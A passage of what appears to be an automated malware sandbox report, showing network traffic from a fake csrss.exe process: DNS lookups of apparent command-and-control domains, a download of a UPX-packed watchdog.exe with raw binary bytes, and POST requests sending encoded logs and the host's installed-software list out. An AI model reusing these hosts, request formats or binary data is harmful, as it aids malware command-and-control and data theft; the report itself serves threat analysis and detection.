                                                                                                                          Nov 11, 2021 01:57:56.036534071 CET44349754172.67.207.136192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:56.081284046 CET44349754172.67.207.136192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:56.081760883 CET49754443192.168.2.3172.67.207.136
                                                                                                                          Nov 11, 2021 01:57:56.082900047 CET49754443192.168.2.3172.67.207.136
                                                                                                                          Nov 11, 2021 01:57:56.082927942 CET44349754172.67.207.136192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:56.082951069 CET49754443192.168.2.3172.67.207.136
                                                                                                                          Nov 11, 2021 01:57:56.082962990 CET44349754172.67.207.136192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:16.818532944 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:58:16.835051060 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.746227026 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.746284008 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.746428013 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.747951031 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.747977972 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.807038069 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.807887077 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.807944059 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.809734106 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.809766054 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.812488079 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.812685013 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.817681074 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.817869902 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.818011045 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.818046093 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.866313934 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.898674011 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.898920059 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.899046898 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.899463892 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.899496078 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.899517059 CET49808443192.168.2.3172.67.139.144
                                                                                                                          Nov 11, 2021 01:58:41.899530888 CET44349808172.67.139.144192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:46.843394041 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:58:46.860086918 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:59:16.864655018 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:59:16.880991936 CET8049752172.67.196.11192.168.2.3

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 11, 2021 01:57:25.558749914 CET5745953192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:25.580398083 CET53574598.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.601104021 CET5787553192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:25.622384071 CET53578758.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.633168936 CET5415453192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:25.654891014 CET53541548.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.798604012 CET5280653192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:25.819714069 CET53528068.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:25.941287041 CET5391053192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:25.962297916 CET53539108.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:29.762208939 CET6402153192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:29.781250954 CET53640218.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:31.092811108 CET6078453192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:31.111459970 CET53607848.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:45.395169020 CET5114353192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:45.415052891 CET53511438.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.263003111 CET5600953192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:46.282412052 CET53560098.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:52.263390064 CET4957253192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:52.282677889 CET53495728.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:55.960362911 CET6082353192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:57:55.981394053 CET53608238.8.8.8192.168.2.3
                                                                                                                          Nov 11, 2021 01:58:41.725279093 CET5377753192.168.2.38.8.8.8
                                                                                                                          Nov 11, 2021 01:58:41.744313002 CET53537778.8.8.8192.168.2.3

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                          Nov 11, 2021 01:57:25.558749914 CET192.168.2.38.8.8.80x65feStandard query (0)trumops.com16IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.601104021 CET192.168.2.38.8.8.80x1f10Standard query (0)logs.trumops.com16IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.633168936 CET192.168.2.38.8.8.80xc9fdStandard query (0)f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com16IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.798604012 CET192.168.2.38.8.8.80x4e67Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.941287041 CET192.168.2.38.8.8.80x4744Standard query (0)server8.trumops.comA (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:29.762208939 CET192.168.2.38.8.8.80x2cd1Standard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:31.092811108 CET192.168.2.38.8.8.80x443eStandard query (0)server8.trumops.comA (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:45.395169020 CET192.168.2.38.8.8.80x7046Standard query (0)server8.trumops.comA (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:46.263003111 CET192.168.2.38.8.8.80x6c70Standard query (0)gohnot.comA (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:52.263390064 CET192.168.2.38.8.8.80x3ceeStandard query (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com16IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:55.960362911 CET192.168.2.38.8.8.80x96aaStandard query (0)runmodes.comA (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:58:41.725279093 CET192.168.2.38.8.8.80x97ceStandard query (0)server8.trumops.comA (IP address)IN (0x0001)

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                          Nov 11, 2021 01:57:25.580398083 CET8.8.8.8192.168.2.30x65feNo error (0)trumops.comTXT (Text strings)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.622384071 CET8.8.8.8192.168.2.30x1f10No error (0)logs.trumops.comTXT (Text strings)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.654891014 CET8.8.8.8192.168.2.30xc9fdName error (3)f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.comnonenone16IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.819714069 CET8.8.8.8192.168.2.30x4e67No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.819714069 CET8.8.8.8192.168.2.30x4e67No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.962297916 CET8.8.8.8192.168.2.30x4744No error (0)server8.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:25.962297916 CET8.8.8.8192.168.2.30x4744No error (0)server8.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:29.781250954 CET8.8.8.8192.168.2.30x2cd1No error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:29.781250954 CET8.8.8.8192.168.2.30x2cd1No error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:31.111459970 CET8.8.8.8192.168.2.30x443eNo error (0)server8.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:31.111459970 CET8.8.8.8192.168.2.30x443eNo error (0)server8.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:45.415052891 CET8.8.8.8192.168.2.30x7046No error (0)server8.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:45.415052891 CET8.8.8.8192.168.2.30x7046No error (0)server8.trumops.com104.21.79.9A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:46.282412052 CET8.8.8.8192.168.2.30x6c70No error (0)gohnot.com172.67.196.11A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:46.282412052 CET8.8.8.8192.168.2.30x6c70No error (0)gohnot.com104.21.92.165A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:52.282677889 CET8.8.8.8192.168.2.30x3ceeNo error (0)e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.comTXT (Text strings)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:55.981394053 CET8.8.8.8192.168.2.30x96aaNo error (0)runmodes.com172.67.207.136A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:57:55.981394053 CET8.8.8.8192.168.2.30x96aaNo error (0)runmodes.com104.21.34.203A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:58:41.744313002 CET8.8.8.8192.168.2.30x97ceNo error (0)server8.trumops.com172.67.139.144A (IP address)IN (0x0001)
                                                                                                                          Nov 11, 2021 01:58:41.744313002 CET8.8.8.8192.168.2.30x97ceNo error (0)server8.trumops.com104.21.79.9A (IP address)IN (0x0001)

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • runmodes.com
                                                                                                                          • server8.trumops.com
                                                                                                                          • gohnot.com

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.2.349747104.21.34.203443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          1192.168.2.349748104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          2192.168.2.349749104.21.34.203443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          3192.168.2.349750104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          4192.168.2.349751172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          5192.168.2.349754172.67.207.136443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          6192.168.2.349808172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          7192.168.2.349752172.67.196.1180C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Nov 11, 2021 01:57:46.367980957 CET1050OUTGET /61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe HTTP/1.1
                                                                                                                          Host: gohnot.com
                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                          Uuid: f7873597-7b36-4441-9416-097456f134ae
                                                                                                                          Version: 183
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          Nov 11, 2021 01:57:46.396821022 CET1051INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 11 Nov 2021 00:57:46 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2102272
                                                                                                                          Connection: keep-alive
                                                                                                                          content-disposition: attachment; filename=watchdog.exe
                                                                                                                          etag: "616ea494-201400"
                                                                                                                          last-modified: Tue, 19 Oct 2021 10:57:24 GMT
                                                                                                                          Cache-Control: max-age=3600
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 3465
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mUdca%2FhPVx%2BcuIN0mD4co%2Fq%2B%2FeXbPU6Zq0S%2FW1p4uyl4SjDH8JZzFzI5IDyMwm0EeLJ8hLsHyRpILoj74RMKgCuPLLbsz17avF1sdGfbIzhrwOIhomElDn412zdD"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac39180d8125c92-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
                                                                                                                          Nov 11, 2021 01:57:46.396887064 CET1053INData Raw: 00 00 00 00 00 00 40 00 00 c0 33 2e 39 35 00 55 50 58 21 0d 09 08 09 59 97 50 98 0e ef ba a0 1e 64 4d 00 e9 0c 20 00 00 b6 4b 00 26 27 00 ab ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 38 4c 67 64 4e 77 31 30 4f 4d 6e 6a 6e 45 61
                                                                                                                          Data Ascii: @3.95UPX!YPdM K&' Go build ID: "8LgdNw10OMnjnEafoouob/F_u>d7bw5LzGyMt067q/f_4En-IIykrT4Xu-NukD/RUnzYHIbGfj1LuaRla" d;av 'D$$`k&fdnlL$h
                                                                                                                          Nov 11, 2021 01:57:46.396924973 CET1054INData Raw: 1c 0c 73 04 3e 28 c3 88 c1 57 72 50 84 1b b4 07 0c a9 08 71 3f 90 7d de 6c e4 a9 20 1b f8 1b 21 df ad c0 e2 ca 88 15 bb fa 01 45 e5 1b 02 8f 10 2c 27 e6 95 4d 43 db 5d 39 d9 18 20 bb 9c 8b e2 a9 2b 74 90 61 97 52 a9 04 39 28 20 64 b1 3b 7a f8 08
                                                                                                                          Data Ascii: s>(WrPq?}l !E,'MC]9 +taR9( d;zW=59ky,.@yi-(8HXh:xI.>!$2erxHj!pTq60#.?WD8kmNq_VN]SY?.
                                                                                                                          Nov 11, 2021 01:57:46.396956921 CET1055INData Raw: bb 9f 0f 86 b6 d9 a7 f0 bf 42 a2 88 a0 57 c9 0f 2e c1 75 06 0f 8b 86 02 97 f6 1f 1a 2e c0 75 02 7b 5b 6a 05 80 dd 13 76 df 41 40 18 8b 88 90 11 90 94 e4 90 17 89 fb ff 5f f5 cb c1 e1 11 e4 89 d3 31 ca c1 e9 07 31 d1 89 da c1 eb 10 31 cb 89 98 45
                                                                                                                          Data Ascii: BW.u.u{[jvA@_111E7M15ivEbxVsAuF&(fQ2f<c'9({'~7-E!2r5X*>- tgIfY^I t)1wxMeY!(
                                                                                                                          Nov 11, 2021 01:57:46.396987915 CET1057INData Raw: 14 81 ab b4 50 1f 9a 57 c1 a8 d6 44 6d 1a 60 3e 6c 8d 1f c2 2d 70 2a 0b 02 8a ac 64 ab 33 3e 1e 66 67 70 a0 8b 4f f0 72 e4 ad 40 7f 5e 23 01 7e 30 b8 97 20 ed 79 ef 40 76 23 0e 4c 30 87 d1 47 e6 13 60 7f 40 ae 1c 83 c0 ac b0 02 66 2a 0a f0 14 b9
                                                                                                                          Data Ascii: PWDm`>l-p*d3>fgpOr@^#~0 y@v#L0G`@f*DT+o0BqGt4;=&:%HId,fQlba0RlLp)-pKhxp$BA9M49L{^pA,}b?1DI'\8"?v>eh
                                                                                                                          Nov 11, 2021 01:57:46.397028923 CET1058INData Raw: 19 96 cb 99 58 24 19 12 4d a8 ca 28 a6 e9 13 ae 78 fc a1 40 44 e8 09 83 c3 0c a4 52 fd 8b 7b fd 4b e0 1b fa 17 77 2d 8b 3f b4 01 fd 39 fa 76 1d fc ff 1f e8 f0 28 ce 29 fd 29 fa 39 e9 76 09 46 29 e9 39 c6 7c cd eb a8 8c 8b 83 1f 37 d7 eb df 0c 38
                                                                                                                          Data Ascii: X$M(x@DR{Kw-?9v())9vF)9|78 L`0|4<$lCuL$)80@&)4D<-z80.btQL_a%I=z?[H,y@c$70i?Y(6-p*TY8Y7>lEz*P89P
                                                                                                                          Nov 11, 2021 01:57:46.397070885 CET1059INData Raw: 1b d3 6f 20 b7 01 06 9c 49 38 85 a3 c2 00 d5 20 13 62 24 46 f8 05 01 bc ee ff be 02 23 d8 df f8 20 89 5c 24 04 14 32 32 c1 df 20 10 b0 92 b2 62 be 19 02 2b 23 0c 80 06 19 f1 32 f5 0b 5c 31 49 14 1c f5 af cf 6e 81 84 46 10 bb df eb 11 90 70 16 17
                                                                                                                          Data Ascii: o I8 b$F# \$22 b+#2\1InFp,`&QXYM9Q!uSP`GCJ#i`DF@'O[EJBBJKP07pl!A#?A(#:tx^G\2Dp%B*X3GZ
                                                                                                                          Nov 11, 2021 01:57:46.397109985 CET1061INData Raw: b8 4e b8 39 7f b3 b1 e1 e9 7e 76 f4 3c 2e 32 3d 97 74 28 31 ff 97 ff 0b de 14 72 0e d8 8d 45 01 68 77 74 29 c1 89 ca f7 d9 c1 f9 06 d2 3b f8 1f 21 c8 01 f0 30 34 9e 38 97 57 c0 41 4e f1 a0 22 34 60 20 58 01 03 f3 5c 21 bc 6a 7f 6c 05 46 c6 7c 24
                                                                                                                          Data Ascii: N9~v<.2=t(1rEhwt);!048WAN"4` X\!jlF|$`*$)ZYq!+E|4tE_q_/]Kj hB9sG4V8?(ArZw ArkZ GX+\P ;A*\F1$",V3
                                                                                                                          Nov 11, 2021 01:57:46.397150993 CET1062INData Raw: e2 e1 e6 68 c6 52 c0 cb 94 cb 6c b8 e0 01 94 16 a3 a0 5a 89 c2 ad a4 5e d1 9b 3d ea eb f1 89 f8 e3 d3 88 07 9c 0d b9 08 4f 27 4d 5e 87 2a 8d ac df 93 07 9f ff f7 00 bc 78 f0 7c 3e 5f 1c 8b 48 08 81 f9 6d 54 1a 6c ff 88 ae b3 3e e9 72 f9 8c 02 25
                                                                                                                          Data Ascii: hRlZ^=O'M^*x|>_HmTl>r%y)W6.=j+E9'O"ku\VR>IJ*bVm>p kt=FB3hy?(hFSx;?Y|%Ux$: \GWx?PrO#
                                                                                                                          Nov 11, 2021 01:57:46.397191048 CET1064INData Raw: 87 ab 07 80 44 68 63 70 0a 6f 76 c7 47 b3 47 6f 5b e2 b7 b5 d6 76 c5 0f 2c 10 00 3b 14 02 bd 49 38 46 1d 47 54 75 45 89 47 a3 23 f3 af fa 3c 8e 03 f0 fc 8d 74 24 34 19 f0 d6 54 42 68 3d 44 1e 5c 7c 31 06 dc d4 64 89 4c 55 85 b0 02 32 32 3e 85 db
                                                                                                                          Data Ascii: DhcpovGGo[v,;I8FGTuEG#<t$4TBh=D\|1dLU22>HEt\O8f06pWdhwjlptF[/C +U(KLmq'0'tp(#'I07E|(,3Wl/LT_AJGgR_K@~
                                                                                                                          Nov 11, 2021 01:57:46.397231102 CET1065INData Raw: 82 e0 f4 85 f0 7a 30 e4 0f 84 d5 0a 5a 12 ed 09 e8 12 77 d4 d8 44 7d 57 25 46 89 dc 2d fb 1f 03 1f 70 80 25 44 0f b6 12 f6 c2 01 1e 81 7b 9c 52 3f 8f 75 09 99 8c 48 19 7e ec 66 2b f3 44 01 08 8b 57 02 9b 01 9c 9d 85 8c 71 90 49 d8 e3 06 db c3 71
                                                                                                                          Data Ascii: z0ZwD}W%F-p%D{R?uH~f+DWqIq&PciQi8pD3J02,\aHDJ# p_ DT.P<?8tfXg,\wg9t1i1OCTC
                                                                                                                          Nov 11, 2021 01:58:16.818532944 CET9336OUTData Raw: 00
                                                                                                                          Data Ascii:
                                                                                                                          Nov 11, 2021 01:58:46.843394041 CET9881OUTData Raw: 00
                                                                                                                          Data Ascii:
                                                                                                                          Nov 11, 2021 01:59:16.864655018 CET9881OUTData Raw: 00
                                                                                                                          Data Ascii:


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.2.349747104.21.34.203443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-11-11 00:57:26 UTC0OUTPOST /api/log HTTP/1.1
                                                                                                                          Host: runmodes.com
                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                          Content-Length: 144
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          2021-11-11 00:57:26 UTC0OUTData Raw: 71 4f 59 76 58 43 58 54 43 37 6d 79 4a 47 49 73 30 35 78 7a 68 45 65 72 32 54 4d 65 38 6e 37 47 6e 6a 61 44 42 58 36 6f 4b 5a 33 2b 46 61 2f 43 44 4f 30 6e 4c 65 6e 34 6f 4e 4b 69 51 78 47 62 65 32 42 4e 6a 32 6f 32 32 78 52 46 43 4a 55 79 6a 49 2b 55 32 6d 58 7a 76 59 46 71 66 32 65 79 4a 55 51 62 6a 48 68 44 37 38 4c 37 75 2f 45 77 33 44 33 70 75 43 5a 63 37 30 4c 64 6a 56 55 45 56 48 2f 70 41 5a 5a 65 6b 47 4c 65 78 39 58 34
                                                                                                                          Data Ascii: qOYvXCXTC7myJGIs05xzhEer2TMe8n7GnjaDBX6oKZ3+Fa/CDO0nLen4oNKiQxGbe2BNj2o22xRFCJUyjI+U2mXzvYFqf2eyJUQbjHhD78L7u/Ew3D3puCZc70LdjVUEVH/pAZZekGLex9X4
                                                                                                                          2021-11-11 00:57:26 UTC12INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 11 Nov 2021 00:57:26 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o15Uarx556ixdHy7oRivRosYtXYjyRifqqP6t1%2BtmZOXZAbOiahwkZVvykPAvESOkuK0O8hYCBqo0339em9U6tDCFHqM8DNcA0ItsELxFNpS7RGTg4CSkl20kQlKzmI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac391019eea699b-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          1192.168.2.349748104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-11-11 00:57:26 UTC0OUTPOST /bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1
                                                                                                                          Host: server8.trumops.com
                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                          Content-Length: 18950
                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          2021-11-11 00:57:26 UTC0OUTData Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 34 35 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 33 31 34 31 34 35 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55
                                                                                                                          Data Ascii: [{"display_name":"Update for Microsoft Office 2016 (KB4484145) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB3141456) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"U
